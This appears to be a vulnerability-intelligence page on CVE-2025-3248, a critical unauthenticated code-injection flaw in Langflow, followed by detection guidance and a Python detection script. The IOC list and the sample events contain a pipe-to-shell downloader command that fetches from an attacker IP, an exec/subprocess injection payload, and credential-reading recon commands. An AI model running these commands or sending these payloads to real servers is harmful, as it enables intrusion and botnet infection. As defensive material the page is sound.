CVE-2025-3248
published 2025-04-07


Priority: P1 (score 100), severity critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability, remediation due 2025-05-26
Exploited in the wild
EPSS: 99.97% (100.0th percentile)
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint. A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.

Affected

5 ranges
Vendor        Product    Version range      Fixed in
langflow-ai   langflow   < 1.9.0            1.9.0
langflow      langflow   < 1.8.2            1.8.2
langflow      langflow   < 1.3.0            1.3.0
langflow      langflow   >= 0, < 1.3.0      1.3.0
langflow      langflow   0 – 1.8.2

The aggregated sources disagree on the fixed version; the CVE description names 1.3.0 as the first release that closes the unauthenticated path to /api/v1/validate/code.

Detection & IOCs (extracted from sources)

url:      https://github.com/verylazytech/CVE-2025-3248
ip:       80.66.75.121
port:     25565
filename: docker
command:  curl -s http://80.66.75.121:25565/docker | sh
ip:       173.212.205.251
  • Monitor for unauthenticated POST requests to the /api/v1/validate/code endpoint; any request that reaches this endpoint without a valid JWT Bearer token or x-api-key header should be treated as suspicious.
  • Detect payloads containing exec() with __import__("subprocess") patterns in POST bodies to /api/v1/validate/code, particularly those embedding system commands inside raise Exception() wrappers.
  • Monitor for outbound curl/wget requests from the Langflow server process to external IPs, especially pipe-to-shell patterns (curl ... | sh), which indicate post-exploitation downloader activity.
  • Hunt for reconnaissance commands (whoami, printenv, ip addr show, ifconfig, capsh --print, systemctl status sshd, cat /root/.bash_history) spawned as child processes of the Langflow application process.
  • Detect exfiltration of .env and .db files from Langflow servers; monitor for reads of environment-variable files and database files shortly after inbound POST requests to the validate/code endpoint.
  • Flag Langflow server processes opening TCP connections to unusual external IPs/ports, consistent with Flodrix botnet C2 communication for receiving DDoS commands.
  • The vulnerability is distinct from CVE-2026-33017, which targets the /api/v1/build_public_tmp/{flow_id}/flow endpoint; both share the same exec()-without-sandboxing root cause but affect different endpoints.
  • The Flodrix botnet payload self-terminates and deletes itself if executed without a valid argument, so initial infection attempts may not leave persistent artifacts; defenders should focus on network-level and process-spawn indicators rather than file persistence alone.
  • CISA added CVE-2025-3248 to its Known Exploited Vulnerabilities catalog on May 5, 2025, confirming active in-the-wild exploitation; treat any unpatched Langflow instance as actively targeted.
  • Ongoing exploitation of CVE-2025-3248 has been linked to the Iranian threat group MuddyWater, indicating nation-state interest in this vulnerability beyond opportunistic botnet operators.
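The request-level and process-level indicators above, turned into detection logic and run over constructed sample events. This is an added example, not code from this page or from the Langflow project. The event shape (method, path, headers, body, child_cmds, file_reads) and the three sample records are assumptions made for illustration; the only real artefact embedded is the downloader one-liner from the IOC list, and the "malicious" request body is a constructed string built to match the exec()/__import__("subprocess")/raise Exception() pattern described above, with a harmless `id` as the embedded command.

```python
"""Detection logic for the CVE-2025-3248 indicators listed above.

Added example. Each event models one inbound HTTP request to a Langflow
instance plus what the Langflow process did shortly afterwards (child
processes spawned, files read). All events below are constructed samples.
"""
import json
import re

VALIDATE_CODE_PATH = "/api/v1/validate/code"

# Request-body indicators: exec() feeding __import__("subprocess"), optionally
# wrapped in raise Exception(...) as the guidance above describes.
EXEC_IMPORT_RE = re.compile(r"exec\s*\(.*?__import__\s*\(\s*['\"]subprocess['\"]", re.S)
RAISE_WRAPPER_RE = re.compile(r"raise\s+Exception\s*\(")

# Post-exploitation process indicators.
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:sh|bash)\b")
RECON_PREFIXES = ("whoami", "printenv", "ip addr show", "ifconfig", "capsh --print",
                  "systemctl status sshd", "cat /root/.bash_history")
SENSITIVE_SUFFIXES = (".env", ".db")


def is_authenticated(headers):
    """True if the request carries a Bearer token or an x-api-key header."""
    h = {k.lower(): v for k, v in headers.items()}
    return h.get("authorization", "").lower().startswith("bearer ") or "x-api-key" in h


def analyze(event):
    """Return the list of indicator names that fire for one event (in order)."""
    findings = []
    to_endpoint = event["path"] == VALIDATE_CODE_PATH
    if event["method"] == "POST" and to_endpoint and not is_authenticated(event["headers"]):
        findings.append("unauthenticated_validate_code")
    if to_endpoint and EXEC_IMPORT_RE.search(event["body"]):
        findings.append("exec_subprocess_payload")
        if RAISE_WRAPPER_RE.search(event["body"]):
            findings.append("raise_exception_wrapper")
    for cmd in event.get("child_cmds", []):
        if PIPE_TO_SHELL_RE.search(cmd):
            findings.append("pipe_to_shell")
        if cmd.strip().startswith(RECON_PREFIXES):
            findings.append("recon_command")
    if any(path.endswith(SENSITIVE_SUFFIXES) for path in event.get("file_reads", [])):
        findings.append("sensitive_file_read")
    return findings


# Constructed sample events (hypothetical, not real telemetry).
SAMPLES = [
    # Benign: an authenticated user validating ordinary component code.
    {"method": "POST", "path": VALIDATE_CODE_PATH,
     "headers": {"Authorization": "Bearer eyJ.constructed.jwt"},
     "body": json.dumps({"code": "def run(x):\n    return x * 2"}),
     "child_cmds": [], "file_reads": []},
    # Malicious shape: no credentials, exec/__import__ payload inside a
    # raise Exception() wrapper, then the IOC downloader, recon and an .env read.
    {"method": "POST", "path": VALIDATE_CODE_PATH,
     "headers": {"Content-Type": "application/json"},
     "body": json.dumps({"code": "raise Exception(exec(\"__import__('subprocess').check_output('id')\"))"}),
     "child_cmds": ["curl -s http://80.66.75.121:25565/docker | sh", "whoami",
                    "cat /root/.bash_history"],
     "file_reads": ["/app/.env", "/app/langflow.db"]},
    # Unauthenticated hit on an unrelated endpoint: outside this rule's scope.
    {"method": "GET", "path": "/api/v1/version", "headers": {}, "body": "",
     "child_cmds": [], "file_reads": []},
]


def run_samples():
    """Analyze every sample event; returns one findings list per event."""
    return [analyze(e) for e in SAMPLES]


if __name__ == "__main__":
    for event, findings in zip(SAMPLES, run_samples()):
        print(f"{event['method']} {event['path']}: {findings or 'clean'}")
```

The process-spawn and file-read checks are kept in the same function as the HTTP checks deliberately: the guidance above stresses that Flodrix removes itself from disk, so a request that fires both the body pattern and a pipe-to-shell child within the same window is a much stronger signal than either alone, and correlating them per request is what makes the alert actionable.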

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ghsa                  9.8     CRITICAL
osv                   9.8     CRITICAL
vulncheck             9.8     CRITICAL
cisa                  9.8     CRITICAL